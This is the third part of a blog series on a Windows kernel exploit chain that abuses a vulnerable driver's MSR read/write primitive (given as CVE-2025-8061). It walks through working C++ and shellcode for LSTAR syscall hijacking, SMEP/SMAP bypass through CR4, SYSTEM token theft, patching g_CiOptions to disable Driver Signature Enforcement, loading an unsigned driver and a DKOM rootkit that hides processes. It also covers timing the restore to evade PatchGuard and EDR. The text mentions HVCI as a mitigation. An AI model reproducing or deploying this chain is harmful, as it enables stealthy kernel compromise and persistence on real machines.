bypassing-dse

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

In Part 1 we established the vulnerability fundamentals. In Part 2 we evolved the exploit from a fragile PoC into a reliable exploit chain. Part 3 answers the question that naturally follows: what do you actually do with SYSTEM once you have it?

The privilege escalation from Parts 1 and 2 is powerful, but it’s visible. A SYSTEM shell appears in Task Manager. Security tools still see every process we spawn. Endpoint Detection and Response (EDR) solutions can still hook our API calls and flag anomalous behavior.

True persistence and stealth require going deeper. We need to:

Disable Driver Signature Enforcement (DSE) to load unsigned code into the kernel
Deploy a rootkit that hides processes via Direct Kernel Object Manipulation (DKOM)
Restore DSE immediately to evade PatchGuard’s integrity sweeps
Exit cleanly without leaving traces

Overview: The Seven-Stage Attack Chain

The full chain executes in seven distinct stages, each building on the previous:

                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 1: INFORMATION LEAK                                                │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Read LSTAR MSR (0xC0000082) -> Contains KiSystemCall64 address           │
                │  Scan ntoskrnl.exe for the KiSystemCall64 RVA                             │
                │  Subtract known offset -> ntoskrnl.exe base recovered                     │
                │  Result: kASLR defeated                                                   │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 2: SYSCALL HIJACK                                                  │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Scan ntoskrnl.exe for the gadgets RVAs                                   │
                │  Write LSTAR MSR -> Point to "swapgs; iretq" gadget                       │
                │  Build iretq frame on user stack                                          │
                │  Fire syscall -> CPU jumps to our ROP chain instead of KiSystemCall64     │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 3: CR4 REGISTER LEAK                                               │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Usermode: Allocate locked userspace memory for the leaked CR4            │
                │  ROP: mov rax, cr4... -> Write CR4 value into usermode buffer             │
                │  ROP: wrmsr -> Restore LSTAR inside Ring 0 before returning               │
                │  Usermode: Read the CR4 and compute SMEP/SMAP-disabled value              │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 4: TOKEN THEFT                                                     │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  ROP: Disable SMEP/SMAP via CR4 write                                     │
                │  Shellcode: gs:[0x188] -> KTHREAD -> EPROCESS                             │
                │  Walk ActiveProcessLinks until PID == 4 (System)                          │
                │  Copy System token to our EPROCESS -> We are now NT AUTHORITY\SYSTEM      │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 5: DSE BYPASS                                                      │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  NtQuerySystemInformation -> Leak ci.dll kernel base (requires SYSTEM)    │
                │  Scan ci.dll for g_CiOptions RVA via pattern matching                     │
                │  Ring 0 shellcode: Read original value, write 0x0 to disable DSE          │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 6: ROOTKIT DEPLOYMENT                                              │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  CreateService + StartService -> ci.dll skips signature check             │
                │  Rootkit DriverEntry executes -> DKOM unlinks target process              │
                │  Target process vanishes from Task Manager and NtQuerySystemInformation   │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 7: CLEANUP                                                         │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Restore g_CiOptions immediately -> Evade PatchGuard detection            │
                └───────────────────────────────────────────────────────────────────────────┘

Why System Privileges Are Required

Before we dive into DSE bypass mechanics, there’s an important architectural detail to address: the full chain requires the System token to execute. So token stealing is still the first step here, but why?

The Kernel Module Enumeration Wall

The answer lies in Stage 5. To patch g_CiOptions, we need to know its absolute kernel address. That requires two pieces of information:

The RVA of g_CiOptions within ci.dll, obtained via pattern scanning
The kernel base address of ci.dll, obtained via NtQuerySystemInformation

The first is trivial. We can map ci.dll into usermode memory and scan it just like we did with ntoskrnl.exe. But the second presents a hard barrier.

NtQuerySystemInformation(SystemModuleInformation) returns a list of all loaded kernel modules, including their ImageBase addresses. However, Microsoft implemented a critical restriction: the ImageBase field is only populated for High Integrity (Administrator) or SYSTEM processes.

// What a Medium Integrity process sees:
ci.dll ImageBase = 0x0000000000000000  // Useless

// What an Administrator/SYSTEM process sees:
ci.dll ImageBase = 0xFFFFF8051A2B0000  // Real address

If we attempt to build shellcode with ciBase = 0x0, the target address becomes 0x0 + RVA = 0x4A004. Writing to that address in Ring 0 triggers an immediate page fault. The system bluescreens before our rootkit ever loads.

The Modular Shellcode Architecture

Part 2’s shellcode was monolithic: a single BuildShell function that emitted LSTAR restoration, token theft, and system state recovery all in one blob. This worked for privilege escalation, but the full chain requires three distinct Ring 0 payloads:

Token theft: steal SYSTEM token
DSE patch: write 0x0 to g_CiOptions
DSE restore: write original value back to g_CiOptions

Building these as separate monolithic functions would duplicate hundreds of lines of code. The prologue (LSTAR restoration) and epilogue (CR4/SYSRET return sequence) are identical across all three. Only the core payload logic differs.

The Templater

The solution is a templating function that wraps any custom payload with the standard Ring 0 boilerplate. Conceptually, the final generated memory blob looks like this:

+---------------------------------------------+
| Phase 1: Prologue (Restore LSTAR)           |  <- Identical across all payloads
+---------------------------------------------+
| Phase 2: Core Payload                       |  <- Dynamic / Swappable 
+---------------------------------------------+
| Phase 3: Epilogue (Return to User Mode)     |  <- Identical across all payloads
+---------------------------------------------+

SIZE_T BuildRing0Scaffolding(BYTE* FinalPayloadPtr, 
                UINT64 lstar, 
                UINT64 qGadget_swapgs_sysret, 
                UINT64 qGadget_poprcx_ret, 
                UINT64 qGadget_movcr4_rcx_ret,
                UINT64 CR4_original,
                const BYTE* customPayload,
                SIZE_T customSize);

This function constructs a complete Ring 0 shellcode blob in three phases:

Phase 1: LSTAR Restoration

Every shellcode begins by immediately restoring LSTAR to KiSystemCall64. This is critical because the very first instruction after returning from Ring 0 might be a system call (memory allocation, console output, anything). If LSTAR still points to our swapgs ; iretq gadget, that syscall will trigger a crash.

// PROLOGUE: Restore LSTAR
// mov ecx, 0xC0000082
builder.Append("\xb9\x82\x00\x00\xc0", 5);

// mov edx, LSTAR_HIGH
DWORD lstar_hi = (DWORD)(lstar >> 32);
builder.Append("\xba", 1);
builder.Append(&lstar_hi, 4);

// mov eax, LSTAR_LOW
DWORD lstar_lo = (DWORD)(lstar & 0xFFFFFFFF);
builder.Append("\xb8", 1);
builder.Append(&lstar_lo, 4);

// wrmsr
builder.Append("\x0f\x30", 2);

Phase 2: Custom Payload Injection

The middle section simply copies the caller’s payload bytes:

if (customPayload != NULL && customSize > 0) {
    builder.Append(customPayload, customSize);
}

Phase 3: System State Restoration

After the payload executes, we need to:

Re-enable SMEP/SMAP by restoring the original CR4
Transition back to Ring 3 via swapgs ; sysret
Resume execution at the saved userland return address

This is implemented as a ROP chain pushed onto the stack:

// Push chain in reverse order (LIFO)

// swapgs ; sysret ; ret gadget
builder.Append("\x48\xba", 2);
builder.Append(&qGadget_swapgs_sysret, 8); 
builder.Append("\x52", 1);     // push rdx

// Push saved userland RIP (stored in R12 by PrepareStack.asm)
builder.Append("\x41\x54", 2); // push r12

// pop rcx ; ret gadget (to load CR4)
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_poprcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// mov cr4, rcx ; ret gadget
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_movcr4_rcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// Original CR4 value (with SMEP/SMAP enabled)
builder.Append("\x48\xba", 2); 
builder.Append(&CR4_original, 8); 
builder.Append("\x52", 1);     // push rdx

// pop rcx ; ret gadget (entry point)
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_poprcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// Restore original RFLAGS into R11 (sysret loads RFLAGS from R11)
builder.Append("\x49\x89\xdb", 3); // mov r11, rbx

// Trigger the ROP chain
builder.Append("\xc3", 1);     // ret

Disabling Driver Signature Enforcement

With SYSTEM privileges confirmed, we can proceed to disable DSE. This is the critical gate that prevents unsigned drivers from loading.

What is DSE? Driver Signature Enforcement is Windows’ mechanism for ensuring only Microsoft-signed or cross-signed drivers can execute in Ring 0. When a driver is loaded via NtLoadDriver or the Service Control Manager, the kernel’s Code Integrity module (ci.dll) verifies the driver’s Authenticode signature.

This enforcement is controlled by a global variable: g_CiOptions. This DWORD bitmask determines what level of signature checking is applied. Setting g_CiOptions to 0x0 completely disables signature verification. Any driver can load, signed or not.

Finding g_CiOptions Dynamically

Rather than hardcoding build-specific offsets, we scan ci.dll for the instruction that references g_CiOptions:

DWORD GetCiOptionsRVA() {
    HMODULE hCi = LoadLibraryExA("C:\\Windows\\System32\\ci.dll", 
                                  NULL, DONT_RESOLVE_DLL_REFERENCES);
    
    // Pattern: mov cs:g_CiOptions, ecx / mov r13d, ecx
    // Found in CipInitialize
    const char* pattern = "\x89\x0D\x00\x00\x00\x00\x44\x8B\xE9";
    const char* mask    = "xx????xxx";
    
    DWORD instructionRva = ScanModuleForRVA(hCi, pattern, mask, NULL);
    
    // Extract RIP-relative offset
    UINT8* matchAddress = (UINT8*)hCi + instructionRva;
    INT32 ripOffset = *(INT32*)(matchAddress + 2);
    
    // Calculate: RIP of next instruction + offset = g_CiOptions address
    UINT8* ripNextInstruction = matchAddress + 6;
    UINT8* gCiOptionsLocalAddress = ripNextInstruction + ripOffset;
    
    DWORD dataRva = (DWORD)(gCiOptionsLocalAddress - (UINT8*)hCi);
    
    FreeLibrary(hCi);
    return dataRva;
}

The key insight is that mov cs:g_CiOptions, ecx uses RIP-relative addressing. The instruction encodes a 32-bit signed offset from the end of the instruction to the target variable. We extract this offset, add it to the instruction’s end address, and compute the RVA.

Leaking ci.dll’s Kernel Base

With the RVA in hand, we need the runtime base address. NtQuerySystemInformation provides this:

UINT64 LeakKernelModuleBase(const char* targetModuleName) {
    PNtQuerySystemInformation NtQuerySystemInformation = 
        (PNtQuerySystemInformation)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), 
            "NtQuerySystemInformation"
        );
    
    ULONG returnLength = 0;
    NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &returnLength);
    returnLength += 10 * 1024;  // Buffer for race conditions
    
    PVOID buffer = VirtualAlloc(NULL, returnLength, 
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    
    NtQuerySystemInformation(SystemModuleInformation, buffer, 
                             returnLength, &returnLength);
    
    PRTL_PROCESS_MODULES modules = (PRTL_PROCESS_MODULES)buffer;
    
    for (ULONG i = 0; i < modules->NumberOfModules; i++) {
        char* baseName = (char*)modules->Modules[i].FullPathName + 
                         modules->Modules[i].OffsetToFileName;
        
        if (_stricmp(baseName, targetModuleName) == 0) {
            UINT64 base = (UINT64)modules->Modules[i].ImageBase;
            VirtualFree(buffer, 0, MEM_RELEASE);
            return base;
        }
    }
    
    VirtualFree(buffer, 0, MEM_RELEASE);
    return 0;
}

The function iterates through all loaded kernel modules until it finds ci.dll, then returns its ImageBase. If we’re not running as Administrator/SYSTEM, this returns 0 and the exploit aborts safely.

The DSE Shellcode

The DSE patch payload is simple:

SIZE_T BuildDsePayload(BYTE* buffer, UINT64 targetKernelAddress, 
                       UINT64 userModePtr, DWORD newValue) {
    PayloadBuilder builder(buffer);

    // movabs rax, targetKernelAddress (load g_CiOptions address)
    builder.Append("\x48\xb8", 2);
    builder.Append(&targetKernelAddress, 8);

    // mov ecx, dword ptr [rax] (read current value)
    builder.Append("\x8b\x08", 2);

    // movabs rdx, userModePtr (load backup variable address)
    builder.Append("\x48\xba", 2);
    builder.Append(&userModePtr, 8);

    // mov dword ptr [rdx], ecx (save original for later restore)
    builder.Append("\x89\x0a", 2);

    // mov dword ptr [rax], newValue (write 0x0 to disable DSE)
    builder.Append("\xc7\x00", 2);
    builder.Append(&newValue, 4);

    return builder.TotalSize;
}

The shellcode:

Loads the kernel address of g_CiOptions into RAX
Reads the current value into ECX
Saves it to a usermode variable (for restoration later)
Writes the new value (0x0) to disable enforcement

Note the use of a usermode pointer (&originalDseValue) from Ring 0 shellcode. This works because we’ve disabled SMAP via the CR4 write that happens before our payload executes. The kernel can freely access usermode memory.

Loading the Rootkit

With DSE disabled, the Service Control Manager will accept our unsigned driver:

BOOL LoadKernelDriver(const char* driverPath, const char* serviceName) {
    SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    
    SC_HANDLE hService = CreateServiceA(
        hSCManager,
        serviceName,
        serviceName,
        SERVICE_ALL_ACCESS,
        SERVICE_KERNEL_DRIVER,    // Critical: kernel driver type
        SERVICE_DEMAND_START,
        SERVICE_ERROR_NORMAL,
        driverPath,
        NULL, NULL, NULL, NULL, NULL
    );
    
    if (!hService && GetLastError() == ERROR_SERVICE_EXISTS) {
        hService = OpenServiceA(hSCManager, serviceName, SERVICE_ALL_ACCESS);
    }
    
    BOOL success = StartServiceA(hService, 0, NULL);
    
    CloseServiceHandle(hService);
    CloseServiceHandle(hSCManager);
    
    return success;
}

If DSE bypass succeeded, StartServiceA maps our .sys file into kernel memory and calls DriverEntry. If DSE is still active, we get error 577 (ERROR_INVALID_IMAGE_HASH), the signature check failed.

The DKOM Rootkit

Once loaded, the rootkit’s job is simple: make a target process invisible.

How Process Enumeration Works

When tools like Task Manager call NtQuerySystemInformation(SystemProcessInformation), the kernel walks a doubly-linked list called PsActiveProcessLinks. Every _EPROCESS structure contains a LIST_ENTRY that chains it to adjacent processes:

    ┌──────────┐     ┌──────────┐     ┌──────────┐
    │ ProcessA │────►│ ProcessB │────►│ ProcessC │
    │          │◄────│ (target) │◄────│          │
    └──────────┘     └──────────┘     └──────────┘
          ▲                                 │
          └─────────────────────────────────┘

If we unlink ProcessB from this list, enumeration skips it entirely. The process continues executing normally but it’s invisible to any tool that relies on the process list.

The Unlink Operation

VOID WalkProcList() {
    PEPROCESS CurrentProcess = PsGetCurrentProcess();
    PEPROCESS StartProcess = CurrentProcess;
    const char* TargetProcess = "hello.exe";

    do {
        PUCHAR ProcessName = (PUCHAR)CurrentProcess + IMAGE_FILE_NAME_OFFSET;
        PLIST_ENTRY CurrentListEntry = (PLIST_ENTRY)
            ((PUCHAR)CurrentProcess + ACTIVE_PROCESS_LINKS_OFFSET);

        if (strncmp((const char*)ProcessName, TargetProcess, 15) == 0) {
            PLIST_ENTRY Next = CurrentListEntry->Flink;
            PLIST_ENTRY Prev = CurrentListEntry->Blink;

            // Unlink: A < > B < > C  becomes  A < > C
            Next->Blink = Prev;
            Prev->Flink = Next;

            // Self-pointer fix (critical for stability)
            CurrentListEntry->Flink = CurrentListEntry;
            CurrentListEntry->Blink = CurrentListEntry;

            return;
        }

        CurrentProcess = (PEPROCESS)
            ((PUCHAR)CurrentListEntry->Flink - ACTIVE_PROCESS_LINKS_OFFSET);

    } while (CurrentProcess != StartProcess);
}

The core unlink is just four lines:

Next->Blink = Prev;
Prev->Flink = Next;
CurrentListEntry->Flink = CurrentListEntry;
CurrentListEntry->Blink = CurrentListEntry;

The first two lines bridge the gap: ProcessA now points directly to ProcessC, and vice versa. But the last two lines are equally important.

The Self-Pointer Fix

Without the self-pointer, when the hidden process eventually terminates, the kernel’s cleanup routine tries to unlink it again. It follows the Flink and Blink pointers… which still point to ProcessA and ProcessC. But those processes have already been updated to skip ProcessB. The cleanup corrupts memory and triggers a BSOD.

By pointing the entry to itself, we create a single-element circular list. The cleanup routine sees:

Flink points to self
Blink points to self
Unlinking a self-referential entry is a no-op

The process terminates cleanly, and the system remains stable.

Racing PatchGuard

There’s a critical timing element to this entire chain: PatchGuard.

PatchGuard (officially “Kernel Patch Protection”) is a Windows security feature that periodically validates the integrity of critical kernel structures. It checks:

Kernel code sections (ntoskrnl.exe, etc.)
System service dispatch tables (SSDT)
Global Descriptor Table (GDT)
Interrupt Descriptor Table (IDT)
Critical global variables… including g_CiOptions

If PatchGuard detects that g_CiOptions has been modified, it triggers bugcheck 0x109 (CRITICAL_STRUCTURE_CORRUPTION). Game over.

The Window

PatchGuard doesn’t run continuously. It executes at pseudo-random intervals, typically every 5-15 minutes. This gives us a window of opportunity:

Patch g_CiOptions to 0x0
Load the unsigned driver
Restore g_CiOptions to its original value
Before PatchGuard’s next sweep

If we complete all three steps before PatchGuard runs, it never sees the modification. The value matches the expected hash, and no alarm is raised.

Implementation

The chain explicitly restores DSE immediately after driver load:

// Patch DSE
WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
PrepareStack(Payload_DsePatch, ...);
// g_CiOptions is now 0x0

// Load driver while DSE is disabled
LoadKernelDriver("C:\\rootkit.sys", "Rootkit");

// Restore DSE immediately
WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
PrepareStack(Payload_DseRestore, ...);
// g_CiOptions restored to original value

The entire DSE-disabled window lasts milliseconds. Unless PatchGuard’s integrity check fires within that window (measured in milliseconds), the modification is never observed.

Putting It All Together

The complete execution flow in fulldsechain.cpp:

int main() {
    // 1. Open vulnerable driver
    HANDLE hDev = OpenDriver();
    
    // 2. Dynamic scanning: find all gadgets and KiSystemCall64 RVA
    HMODULE hNtoskrnl = LoadLibraryExA("ntoskrnl.exe", ...);
    DWORD KISYSTEMCALL64_OFFSET = ScanModuleForRVA(hNtoskrnl, kiPattern, ...);
    DWORD GADGET_SWAPGS_IRETQ   = ScanModuleForRVA(hNtoskrnl, ...);
    // ... scan all required gadgets ...
    
    // 3. Defeat kASLR
    UINT64 lstar = ReadMSR(hDev, MSR_LSTAR);
    UINT64 kernelBase = lstar - KISYSTEMCALL64_OFFSET;
    
    // 4. CR4 leak phase
    void* LeakBuffer = VirtualAlloc(NULL, 0x200, ...);
    VirtualLock(LeakBuffer, 0x200);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStackCr4(...);  // Leaks CR4, restores LSTAR inside Ring 0
    UINT64 CR4_original = *(UINT64*)((UINT8*)LeakBuffer + 0x18);
    UINT64 CR4_smep_smap_off = CR4_original & ~0x300000ULL;
    
    // 5. Token theft phase
    SIZE_T shellSize = BuildRing0Scaffolding(Payload_PrivEsc, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_PrivEsc, ...);
    // Verify: we should now be SYSTEM
    
    // 6. DSE bypass phase
    DWORD ciOptionsRVA = GetCiOptionsRVA();
    UINT64 ciKernelBase = LeakKernelModuleBase("ci.dll");
    UINT64 targetKernelAddress = ciKernelBase + ciOptionsRVA;
    
    BuildRing0Scaffolding(Payload_DsePatch, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_DsePatch, ...);
    // g_CiOptions is now 0x0
    
    // 7. Load rootkit
    LoadKernelDriver("C:\\rootkit.sys", "Rootkit");
    // Target process is now hidden
    
    // 8. Restore DSE
    BuildRing0Scaffolding(Payload_DseRestore, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_DseRestore, ...);
    // g_CiOptions restored, PatchGuard won't notice
    
    // 9. Cleanup
    VirtualFree(Payload_DsePatch, 0, MEM_RELEASE);
    VirtualFree(Payload_DseRestore, 0, MEM_RELEASE);
    VirtualFree(Payload_PrivEsc, 0, MEM_RELEASE);
    CloseHandle(hDev);
    
    return 0;
}

The chain fires three Ring 0 payloads in sequence. Each one overwrites LSTAR, builds a custom stack frame, triggers a syscall that jumps to our ROP chain, executes payload code, restores system state, and returns to usermode. The vulnerable driver is used purely as a primitive provider, and the real exploitation happens in our carefully constructed shellcode.

Why This Fails on HVCI Systems

Everything documented in this series; the LSTAR hijack, CR4 manipulation, g_CiOptions patching… works only when Hypervisor-Enforced Code Integrity is disabled.

On HVCI-enabled systems, the hypervisor intercepts sensitive operations before the kernel sees them:

CR4 Write Interception

The VMCS (Virtual Machine Control Structure) configures a CR4 write mask. Any attempt to clear the SMEP or SMAP bits triggers a VM exit:

Guest attempts: mov cr4, rcx (with bit 20 cleared)
Hypervisor: Validates against CR4 mask
Result: CRITICAL_STRUCTURE_CORRUPTION

Our entire ROP chain relies on disabling SMEP. Without that, the first ret to usermode shellcode faults immediately.

KDP-Protected Variables

Kernel Data Protection uses Second Level Address Translation (SLAT) to mark sensitive variables as read-only at the hardware level:

Ring 0 write to g_CiOptions
    ▼
EPT entry: Read-only
    ▼
#EPT_VIOLATION
    ▼
Hypervisor bugchecks the system

The hypervisor doesn’t care that we’re running in Ring 0. It sits below the kernel and enforces policies the kernel can’t override.

The bottom line: HVCI/VBS is the actual security boundary. Everything we’ve built works against systems where it’s disabled, which, unfortunately, still includes many enterprise and consumer machines. But on a properly configured Windows 11 system with Memory Integrity enabled, this entire chain is dead on arrival.

Conclusion

We started this series with a simple question: what can you do with an MSR read/write primitive?

The answer, as it turns out, is everything.

Part 1 established the fundamentals: kASLR bypass via LSTAR, SMEP/SMAP defeat via CR4 manipulation, and Ring 0 shellcode execution via syscall hijacking.
Part 2 made it portable: dynamic gadget scanning, runtime CR4 leaking, and build-aware _EPROCESS traversal.
Part 3 made it dangerous: modular shellcode architecture, DSE bypass via g_CiOptions patching, unsigned driver loading, and DKOM-based process hiding.

The complete chain transforms a single vulnerable driver into a full kernel implant: privilege escalation, signature bypass, and stealth all in one automated executable.

But there is a glaring flaw in our current methodology: noise.

While blinding Driver Signature Enforcement (DSE) allows us to load unsigned code, utilizing standard Windows APIs like NtLoadDriver or the Service Control Manager leaves a massive forensic footprint. The driver is logged in the Event Viewer, a Registry key is created, and the driver object is permanently stamped into the PsLoadedModuleList for any competent EDR to find instantly.

To achieve true stealth, we have to stop playing by the operating system’s rules.

In Part 4, we will abandon the OS Loader entirely. We will dive into Reflective Kernel Loading, the process of manually parsing, mapping, and relocating a compiled .sys file directly into Ring-0 memory without ever touching the disk or alerting the OS. We will also confront the harsh reality of kernel stability, exploring why complex rootkits inevitably crash the system when executed from a hijacked syscall context, and how to use raw Physical Memory Hooking to achieve flawless, untraceable PASSIVE_LEVEL execution.

See you next time!

> Previous: engineering-a-fully-dynamic-exploit > Next: the-ghost-in-the-machine

Mail sent successfully!

Thanks — I'll reply soon.